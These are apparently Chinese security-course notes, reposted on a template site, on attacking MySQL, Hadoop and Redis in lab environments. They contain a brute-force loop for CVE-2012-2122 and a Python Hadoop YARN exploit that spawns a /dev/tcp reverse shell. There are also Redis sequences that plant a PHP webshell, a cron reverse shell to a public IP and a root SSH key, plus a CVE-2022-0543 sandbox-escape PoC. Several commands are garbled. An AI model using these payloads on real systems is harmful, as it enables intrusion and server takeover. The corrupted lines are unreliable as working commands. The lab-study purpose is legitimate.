第54天 服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE
知識點(diǎn):
1、服務(wù)攻防數(shù)據(jù)庫類型安全
2、Redis&Hadoop&Mysql安全
3、Mysql-CVE-2012-2122漏洞
4、Hadoop-配置不當(dāng)未授權(quán)三重奏&RCE漏洞
3、Redis-配置不當(dāng)未授權(quán)三重奏&RCE兩漏洞
#章節(jié)內(nèi)容:
常見服務(wù)應(yīng)用的安全測試:
1、配置不當(dāng)-未授權(quán)訪問
2、安全機(jī)制特定安全漏洞
3、安全機(jī)制弱口令爆破攻擊
#前置知識:
應(yīng)用服務(wù)安全測試流程:見圖
組合猜測(由于nat會(huì)導(dǎo)致端口掃描不到真實(shí)端口信息)、信息來源(報(bào)錯(cuò)、特征)
1、判斷服務(wù)開放情況-端口掃描&組合應(yīng)用等
2、判斷服務(wù)類型歸屬數(shù)據(jù)庫&文件傳翰&通訊等
3、判斷服務(wù)利用方式特定漏洞&未授權(quán)&弱口令等
演示案例:
Mysq-未授權(quán)訪問-CVE-2012-2122利用
Hadoop-.未授權(quán)訪問-內(nèi)置配合命令執(zhí)行RCE
Redis-未授權(quán)訪問-Webshelle&任務(wù)&密匙&RCE等
Mysq-未授權(quán)訪問-CVE-2012-2122利用
復(fù)現(xiàn)環(huán)境:vulhub
for i in `seq 1 1000`; do mysql -uroot -pwrong -h you-ip -P3306 ; done
漏洞復(fù)現(xiàn):
1、vulhub開啟漏洞環(huán)境
2、攻擊機(jī):kali掃描目標(biāo)端口并驗(yàn)證
Hadoop-未授權(quán)訪問-內(nèi)置配合命令執(zhí)行RCE
復(fù)現(xiàn)環(huán)境:vulfocus
思路:訪問特定
#!/usr/bin/env python
import requests
target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
},
},
'application-type': 'YARN',
}
requests.post(url, json=data)
漏洞復(fù)現(xiàn):
1、vulhub搭建hadoop漏洞環(huán)境
2、攻擊機(jī)kali開啟nc監(jiān)聽端口,使用exp攻擊反彈shell
#Redis-未授權(quán)訪問-Webshell&任務(wù)&密匙&RCE等
1、寫Webshell需得到Web路徑
利用條件:Web目錄權(quán)限可讀寫
config set dir /tmp
#設(shè)置WEB寫入目錄
config set dbfilename1.php設(shè)置寫入文件名
set test"c?php phpinfo):?>"#設(shè)置寫入文件代碼
bgsave
#保存執(zhí)行
save
#保存執(zhí)行
注意:部分沒目錄權(quán)限讀寫權(quán)限
2、寫定時(shí)任務(wù)反單shell
利用條件:
允許異地登錄
安全模式protected-mode處于關(guān)閉狀態(tài)
config set dir /var/spool/cron
set yy “ninin*****bash->&/dev/tcp/47.94.236.117/55550>&1nnn”
config set dbfilename x
save
注意:
centos會(huì)忽略亂碼去執(zhí)行格式正確的任務(wù)計(jì)劃
而ubuntu并不會(huì)忽略這些亂L碼,所以導(dǎo)致命令執(zhí)行失敗
3、寫入Linux ssh-key公鑰
利用條件:
允許異地登錄
Redis服務(wù)使用ROOT賬號啟動(dòng)
安全模式protected-mode處于關(guān)閉狀態(tài)
允許使用密鑰登錄,即可遠(yuǎn)程寫入一個(gè)公鑰,直接登錄遠(yuǎn)程服務(wù)器
ssh-keygen-t rsa
cd /root/.ssh/
(echo -e “nin”;cat id_rsa.pub;echo-e"nin")>key.txt
cat key.txt redis-cli-h 118.31.57.214 -x set xxx
config set dir /root/.ssh/
config set dbfilename authorized keys
save
cd /root/.ssh/
ssh -i id rsa root@118.31.57.214
4、RCE自動(dòng)化利用腳本-vulfocus
https://github.com/vulhub/redis-rogue-getshell
python redis-.master…py-f123.58.236.76-p9830-L47.94.236.117-P8888-f
RedisModulesSDK/exp.so -c “id”文章來源:http://www.zghlxwxcb.cn/news/detail-817638.html
5.新漏洞-沙箱繞過RCE CVE-2022-0543-vulfocus
Poc:執(zhí)行id命令
eval 'local io_I package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”,“l(fā)uaopen_io”);
local io io_I();local f=io.popen(“id”,“r”);local res f.read(“a”);f:close();return res’o
參考鏈接:https://blog.csdn.net/qq_40882763/article/details/129742604?spm=1001.2101.3001.6650.2&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-2-129742604-blog-130589818.235%5Ev40%5Epc_relevant_3m_sort_dl_base1&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-2-129742604-blog-130589818.235%5Ev40%5Epc_relevant_3m_sort_dl_base1&utm_relevant_index=5
老哥寫的很詳細(xì),后期我也會(huì)逐個(gè)復(fù)現(xiàn)文章來源地址http://www.zghlxwxcb.cn/news/detail-817638.html
到了這里,關(guān)于網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!